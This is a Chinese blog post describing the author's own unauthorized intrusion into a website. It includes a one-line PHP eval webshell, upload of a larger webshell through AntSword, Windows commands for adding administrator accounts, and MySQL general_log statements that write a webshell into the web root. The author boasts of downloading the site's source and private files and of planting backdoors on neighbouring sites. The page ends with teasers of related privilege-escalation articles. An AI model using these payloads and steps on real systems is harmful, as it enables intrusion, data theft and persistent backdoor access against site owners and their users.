记一次PHP提权

发现

PHP大马:指木马病毒;PHP大马,就是PHP写的提取站点权限的程序;因为带有提权或者修改站点功能,所以称为叫木马。

自从师哥那里听说过之后,一直感叹于PHP大马的神奇...但一直没有机会。

直到有一天,某同学发来一个学习网站,随便翻了翻感觉嘿嘿嘿!还行......

试着上传一句话木马

<?php @eval($_POST['a']);?>

呃,显示上传成功...那就上蚁剑,直接连吧。

结果成了,这比我之前想的简单这么多吗???

既然到这儿了,为什么不试一下PHP大马呢?

来吧!

准备一枚PHP大马,通过蚁剑上传。

(PHP大马代码太多了,在网站直接上传的话,不容易成功)



输入密码,进入一看,我直接好家伙!毕竟是第一次去用它嘛。



网站源码都在里面了,还有网站后门。。。

发现了一个文件夹,点进去,发现了按日期排序的某些不可言明的学习资料。。。直接下载!

那为什么大马能实现这些功能呢?

通过socket或curl远程读取服务器phpapi.info上的大马数据,有意思的一点是把大马数据保存在session中,而不是写到文件中,所以要根据代码查杀是不行的。只要服务器不清除session中的数据,大马就会一直存在。

其他东西

去到上级目录,旁站的数据也看到了。。。还有赌博站、发卡站等,看了看有七八个站。

那网站源码我就存下了,学习资料也顺手留下啦!

顺便在旁站留下后门,别问,问就是为了好好学习!

我们可以新建管理用户、查看PHP版本

(这个站的PHP版本应该是7.1.33的)

还可以MYSQL提权!这我真没想到(这枚大马是师哥送我的,我也是第一次去使用它)

有了MySQL提权,我们可以试着利用日志写入webshell。直接提权的话也可以试试(反正我没试过)。

PHP大马提权过程简写

WINDOWS常见命令:

net user 查看所有用户

query user 查看当前运行中的用户

net user 用户名 密码 修改用户密码

net user 用户名 密码 /add 添加用户

net user 用户名 密码 /active 激活用户

net localgroup administrators 用户名 /add 添加管理员组

1.利用蚁剑上传cmd.exe

2.执行后,先查看所有用户,然后新建用户并将其填到管理员用户组下,用户名密码随便设置一个就好。

3.在WINDOWS10自带搜索框搜素mstsc呼出,点击远程桌面连接,输入ip即可连接服务器

MYSQL提权

MYSQL提权作用很大,我是从别处学到的,学艺不精,不敢妄语。

利用log日志写入WebShell

log日志可以保存所有的查询日志,先执行如下代码看一看基本配置:

 show variables like '%general%';

当 general_log=ON 时,所查询的sql语句都会出现在log文件中。那么,如果把 general_log_file 的路径修改为 shell.php,那么所查询的sql语句就会保存在shell.php中,如果我们执行查询一个一句话,就可以getshell。

set global general_log_file = '/var/www/html/shell.php';    # 设置日志文件地址

select '<?php eval($_POST[abc]);?>';   # 查询一句话,此时日志文件shell.php中将写入webshell

set global general_log=OFF;            #关闭

如果general_log=OFF的话我们还得需要设置为ON模式,再执行上面的sql语句。

set global general_log = ON;

小小看法

PHP大马和蚁剑哪个好用?我个人认为蚁剑好一些,PHP大马的功能,很多都可以利用蚁剑实现(而且我习惯用蚁剑了)。但其实也无所谓。

具体的PHP大马分析在写,有机会的话会写一个具体的PHP大马分析,并给出我的PHP大马。

一次PHP大马提权的更多相关文章

  1. 大马提权详细过程webshell到提权

    .在shell路径这一栏里输入服务器端cmd.exe对应的绝对路径,这里用我们刚刚上传上去的smallchao.exe 8.WINDOWS常见命令:net user 查看所有用户query user ...

  2. 通用型正方教务(通杀各版本)存在注入(不需登陆)+获得webshell+提权内网漫游

    某个接口页面存在oracle盲注,可以获得当前用户数据库,dump教师用户表,分析密文加密特征(前人研究成果+基友助攻),破译加密的密码.前台管理员登陆,后台文件上传基于黑名单原理,过滤u完全,上传特 ...

  3. 常用webshell提权方法总结

    pcAnywhere提权:1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users用 ...

  4. WIN提权总结【本地存档-转载】

    [ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1 ...

  5. Meterpreter提权详解

      0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpr ...

  6. udf提权

    0x00前言: udf提权是通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限 0x01什么是udf: udf(Userdefined function)是用户自定义函数 在my ...

  7. 记一次FileZillaServer提权

    前段时间检测一个企业网站,在检测该企业的一个下属公司的网站时通过用户名admin和密码123456进入了后台,后台目录就是公司汉语拼音+admin,诸如xxxadmin这种形式的.在后台通过“产品图片 ...

  8. [原创]IIS提权工具-VBS提权脚本免杀生成器

    [原创]添加系统用户 VBS提权脚本随机加密生成器[K.8] 2011-05-05 02:42:53|  分类: 原创工具 VBS提权脚本随机加密生成器[K.8]  Author: QQ吻 QQ:39 ...

  9. weblogic系列漏洞整理 -- 3. weblogic 后台提权

    目录 三. weblogic 后台提权 0. 思路分析 1. 利用过程 2. 提示和技巧 一.weblogic安装 http://www.cnblogs.com/0x4D75/p/8916428.ht ...

随机推荐

  1. 第二篇 -- SpringBoot入门Helloworld

    之前讲Jmeter接口的时候讲过社区版怎么创建web接口,那么现在用企业版创建一个Springboot项目.企业版自带Springboot,新建起来更加简单. 第一步:新建一个项目 第二步:选择Spr ...

  2. python中的常用内建属性与内建函数

    常用专有属性常用专有属性 说明 触发方式 __init__ 构造初始化函数 创建实例后,赋值时使用,在__new__后 __new__ 生成实例所需属性 创建实例时 __class__ 实例所在的类 ...

  3. salesforce Integration 概览(一) 杂篇

    本篇参考:https://resources.docs.salesforce.com/sfdc/pdf/integration_patterns_and_practices.pdf 我们在做sales ...

  4. xshell中操作服务器笔记

    sudo su 获取root权限 cd 切换到相应文件夹 ll ls 查看文件夹内容 cp file folder 复制文件到文件夹 \cp为强制覆盖不提示 cp -r /packageA/* /cp ...

  5. Java异常02——自定义异常

    Error与Exception与自定义异常 Error与Exception Error Exception 自定义异常 快捷键: ctrl + alt + t  package exception.d ...

  6. Using Emacs as Clojure IDE

    Open emacs24; Change CWD to parent folder of project home: M-x cd ~/docs/tmp; Build a leiningen proj ...

  7. spring学习06(AOP)

    9.AOP 什么是AOP AOP(Aspect Oriented Programming)意为:面向切面编程,通过预编译方式和运行期动态代理实现程序功能的统一维护的一种技术.AOP是OOP的延续,是软 ...

  8. 小知识get:利用单臂路由实现不同vlan间路由

    一.单臂路由概述 1.1.单臂路由实现不同vlan间通信 链路类型 交换机连接主机的端口为access链路 交换机连接路由器的端口为Trunk链路 子接口 路由器的物理接口可以被划分成多个逻辑接口 每 ...

  9. MongoDB-04-备份和恢复

    mongodb备份和恢复 常用的备份恢复工具 1 ** mongoexport/mongoimport 2 ***** mongodump/mongorestore 备份工具区别在哪里 应用场景总结: ...

  10. Git(9)-- 远程仓库的使用

    @ 目录 1.查看远程仓库:git remote 2.添加远程仓库:git remote add 3.从远程仓库中抓取与拉取:git fetch和 git pull 4.推送到远程仓库:git pus ...